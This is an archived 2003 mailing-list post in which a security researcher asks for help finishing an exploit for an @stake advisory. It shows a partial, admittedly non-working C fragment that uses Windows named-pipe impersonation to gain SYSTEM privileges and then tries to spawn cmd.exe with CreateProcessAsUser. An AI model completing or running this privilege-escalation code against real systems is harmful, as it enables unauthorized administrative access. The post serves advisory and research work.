Hello, I'm attempting to finish up my exploit for the @stake advisory. I've hit quite a snag when I found out that calling a new process does not inherit the privileges of the named pipe. (I must have been thinking of fork() or something, heh.) So I can impersonate SYSTEM, but I can not create a new process with these nice privileges.

Here is where I am at:

    ConnectNamedPipe()  // <-- yada yada, wait for connection

    if (!ImpersonateNamedPipeClient(hPipe))  // impersonate the pipe so we now are SYSTEM
    {
        printf("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
    }

    // found this on msdn, i'm trying to get a token with full access, then call CreateProcessAsUser();
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken))
    {
        if (hToken != INVALID_HANDLE_VALUE)
        {
            CloseHandle(hToken);
            printf("damn: %u\n", GetLastError());
        }
    }

    // this i'm kinda shady on, looks like i'm just mapping the id to the SYSTEM name?
    // when i call GetUserName i get garble after the OpenThreadToken unless i call MapGenericMask...
    MapGenericMask(&dwAccessDesired, pGeneric);

    CreateProcessAsUser(hToken, "cmd.exe", NULL, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi);
    CloseHandle(hPipe);

Now I call CreateProcessAsUser, using the token from OpenThreadToken. In the debugger, it tries to execute cmd, but I get nothing back... If anyone wants to see my code it's at http://sh0dan.org/files/tac0tac0.c...

Thanks, this is starting to bug me :),

-wire
This archive was generated by hypermail 2b30 : Mon Jul 14 2003 - 13:00:51 PDT